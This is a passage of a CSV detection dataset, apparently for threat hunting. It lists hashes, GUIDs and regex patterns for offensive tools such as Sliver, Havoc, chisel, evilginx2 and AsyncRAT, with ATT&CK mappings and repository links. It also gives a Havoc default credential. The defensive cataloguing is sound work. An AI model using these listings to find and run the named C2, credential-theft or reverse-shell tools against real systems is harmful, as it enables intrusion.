emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5feea3420bc6019eda4db16b0c89d205ad258d54313782f236aacbf073bd33fa*",".{0,1000}5feea3420bc6019eda4db16b0c89d205ad258d54313782f236aacbf073bd33fa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5ff663f155004fde14399555c5327e3a67f277574c115cea507ee2998746bd2d*",".{0,1000}5ff663f155004fde14399555c5327e3a67f277574c115cea507ee2998746bd2d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5fffcdd337374e2843c7582b798b983785da5ab3afb6e30b78cef4620d248b09*",".{0,1000}5fffcdd337374e2843c7582b798b983785da5ab3afb6e30b78cef4620d248b09.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5spider:password1234*",".{0,1000}5spider\:password1234.{0,1000}","offensive_tool_keyword","havoc","Havoc is a 
modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*600f564845d4257540556c7dd75333ad0a206c3ce9e88048db23c0ff5396f3f0*",".{0,1000}600f564845d4257540556c7dd75333ad0a206c3ce9e88048db23c0ff5396f3f0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*602ca6be5b05c2a3d9ed9e038ce1fb3d030cc09cc5038ce751d0eeb3041f1f6a*",".{0,1000}602ca6be5b05c2a3d9ed9e038ce1fb3d030cc09cc5038ce751d0eeb3041f1f6a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*602d67f4b63650f0e935953440895184e8edf2b4eab7bfdcf134bc02714156e0*",".{0,1000}602d67f4b63650f0e935953440895184e8edf2b4eab7bfdcf134bc02714156e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4*",".{0,1000}605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*605e19b1230344fa63de6979e952594fa3505e47c91b5022ea0334971e6fe812*",".{0,1000}605e19b1230344fa63de6979e952594fa3505e47c91b5022ea0334971e6fe812.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*608dc4ee1e7301aaa26bf7b95aa83ff1b5464f366deb206c4c148434e1970ccb*",".{0,1000}608dc4ee1e7301aaa26bf7b95aa83ff1b5464f366deb206c4c148434e1970ccb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*60C1DA68-85AC-43AB-9A2B-27FA345EC113*",".{0,1000}60C1DA68\-85AC\-43AB\-9A2B\-27FA345EC113.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" 
"*60dbd3f5c48a846c11f88bdc3d30de5f734edec91b1d18058223a50961195646*",".{0,1000}60dbd3f5c48a846c11f88bdc3d30de5f734edec91b1d18058223a50961195646.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*60de3c5fb9a9dcab760da4377992481cb707fb5c1a633be197c332163b37919b*",".{0,1000}60de3c5fb9a9dcab760da4377992481cb707fb5c1a633be197c332163b37919b.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*60f9d7ae7082d1c524ad8e38377662d82c6b32d3f5b9c5256df4d6e3aa74865e*",".{0,1000}60f9d7ae7082d1c524ad8e38377662d82c6b32d3f5b9c5256df4d6e3aa74865e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*61254294a879235560c1bcf796ff256bc48d2d90*",".{0,1000}61254294a879235560c1bcf796ff256bc48d2d90.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*612789c90ec1040d821a985265ea3b2f57e2c8df90b3880752dcb869e45256bc*",".{0,1000}612789c90ec1040d821a985265ea3b2f57e2c8df90b3880752dcb869e45256bc.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*612cfb5648987cf92203adf35d73749091458a4e95cba244873bab5a73586fc7*",".{0,1000}612cfb5648987cf92203adf35d73749091458a4e95cba244873bab5a73586fc7.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*613e5ca15d9bab3a0bad0c5eb8d63894c1b9fbab924385296c29d3b4f3479ee3*",".{0,1000}613e5ca15d9bab3a0bad0c5eb8d63894c1b9fbab924385296c29d3b4f3479ee3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 
"*614b2740412e8c02cf6d98cbda2c73f35073967ab26398c30ed2b8dd3d1fd619*",".{0,1000}614b2740412e8c02cf6d98cbda2c73f35073967ab26398c30ed2b8dd3d1fd619.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*615ef3781d2e2edf36054417bee9292c51737c9782ab174912d18f0b94de2e66*",".{0,1000}615ef3781d2e2edf36054417bee9292c51737c9782ab174912d18f0b94de2e66.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6174e3710ba961a7ac54c781447de43a120224b7def9fb8dd3b15c7e5ccb855d*",".{0,1000}6174e3710ba961a7ac54c781447de43a120224b7def9fb8dd3b15c7e5ccb855d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*61962c854aa17175796608bf590ae78f3dfcb37a74463a47114b3cdaacc7fc9e*",".{0,1000}61962c854aa17175796608bf590ae78f3dfcb37a74463a47114b3cdaacc7fc9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*619B7612-DFEA-442A-A927-D997F99C497B*",".{0,1000}619B7612\-DFEA\-442A\-A927\-D997F99C497B.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" 
"*61b9260e2f3a75f5ab48bf3fc674810f1afddaa4d79bf670c49771e5ed4c5277*",".{0,1000}61b9260e2f3a75f5ab48bf3fc674810f1afddaa4d79bf670c49771e5ed4c5277.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*61c0af74e23b91ced41254e8d701482a157464d4*",".{0,1000}61c0af74e23b91ced41254e8d701482a157464d4.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*61CE6716-E619-483C-B535-8694F7617548*",".{0,1000}61CE6716\-E619\-483C\-B535\-8694F7617548.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*61CE6716-E619-483C-B535-8694F7617548*",".{0,1000}61CE6716\-E619\-483C\-B535\-8694F7617548.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*61d81c3ef4a77bd815d196b650e773ed31a507320c43c52bb9f6798eff4d3413*",".{0,1000}61d81c3ef4a77bd815d196b650e773ed31a507320c43c52bb9f6798eff4d3413.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*61e2497d69dac4b2bd43cb7f8427a81c52eb4f75e0b75b0550b136f3beff877a*",".{0,1000}61e2497d69dac4b2bd43cb7f8427a81c52eb4f75e0b75b0550b136f3beff877a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*6207b3bdec3775c783313cfe3c278c5d844ed035efdfa02173a23644206d3d97*",".{0,1000}6207b3bdec3775c783313cfe3c278c5d844ed035efdfa02173a23644206d3d97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6212badbf494f425f21ff4792c83e272dfa8b7c3352a993aa352e2cbe6d97106*",".{0,1000}6212badbf494f425f21ff4792c83e272dfa8b7c3352a993aa352e2cbe6d97106.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*628E42D5-AE4F-4CDD-8D14-DAB1A3697B62*",".{0,1000}628E42D5\-AE4F\-4CDD\-8D14\-DAB1A3697B62.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*62a69abb559cbca8163cb933445bce62a2e73f5dffcf2a77e28f8f64fc1889fd*",".{0,1000}62a69abb559cbca8163cb933445bce62a2e73f5dffcf2a77e28f8f64fc1889fd.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and 
filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*62ad0c68652b614acd4b82670b987719dee83f900678788bacf7cef174ea17d9*",".{0,1000}62ad0c68652b614acd4b82670b987719dee83f900678788bacf7cef174ea17d9.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*62ba281147ceeefca5bd15f58ac52125bc42b0e134a6fcb4bd90efdae0fce318*",".{0,1000}62ba281147ceeefca5bd15f58ac52125bc42b0e134a6fcb4bd90efdae0fce318.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*62bba0a6ecfaf6e8052504a2699b1ba24822f2098223ba459f83a29ec4f70cf6*",".{0,1000}62bba0a6ecfaf6e8052504a2699b1ba24822f2098223ba459f83a29ec4f70cf6.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*62d75a789031b5af31711cf4c71df20312613cfbb466ce13f11d8cbd04246872*",".{0,1000}62d75a789031b5af31711cf4c71df20312613cfbb466ce13f11d8cbd04246872.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*62db3e73826eb5cd8b14f3b54e7c476d423f28c0d4e467632fcacf338c250301*",".{0,1000}62db3e73826eb5cd8b14f3b54e7c476d423f28c0d4e467632fcacf338c250301.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*62E3CCF4-07F3-496E-B77D-48D5AC0E6260*",".{0,1000}62E3CCF4\-07F3\-496E\-B77D\-48D5AC0E6260.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*62eb5977f66221339e954ea9e4947966ad4558966264814a406b93dab8b275df*",".{0,1000}62eb5977f66221339e954ea9e4947966ad4558966264814a406b93dab8b275df.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" 
"*62f11b4ae2f0d26ed55efd4c918cfec1bd95036f507cf2dbf3295949831366ca*",".{0,1000}62f11b4ae2f0d26ed55efd4c918cfec1bd95036f507cf2dbf3295949831366ca.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*630BF262-768C-4085-89B1-9FEF7375F442*",".{0,1000}630BF262\-768C\-4085\-89B1\-9FEF7375F442.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*631cdab8f10610656a3f360d18fc7019549a68806579092a83cfdee543a38255*",".{0,1000}631cdab8f10610656a3f360d18fc7019549a68806579092a83cfdee543a38255.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*632b9ef95949f0b11919a46cdb0bf586e8a291ff7c13ce44ba0b0ba83015050d*",".{0,1000}632b9ef95949f0b11919a46cdb0bf586e8a291ff7c13ce44ba0b0ba83015050d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6334665cbd227e91e2fe4517cc5bb0e6f4163aa4ae10430e034df836287dc339*",".{0,1000}6334665cbd227e91e2fe4517cc5bb0e6f4163aa4ae10430e034df836287dc339.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*633bd0cfd64ccc0030ca38148459f71dba02cf3ce103ce24d8a0872c00a26eeb*",".{0,1000}633bd0cfd64ccc0030ca38148459f71dba02cf3ce103ce24d8a0872c00a26eeb.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*6357479243a64e0edc18f138b2f1ccce22e4396db9ecf4740b71f6185ea055f1*",".{0,1000}6357479243a64e0edc18f138b2f1ccce22e4396db9ecf4740b71f6185ea055f1.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the 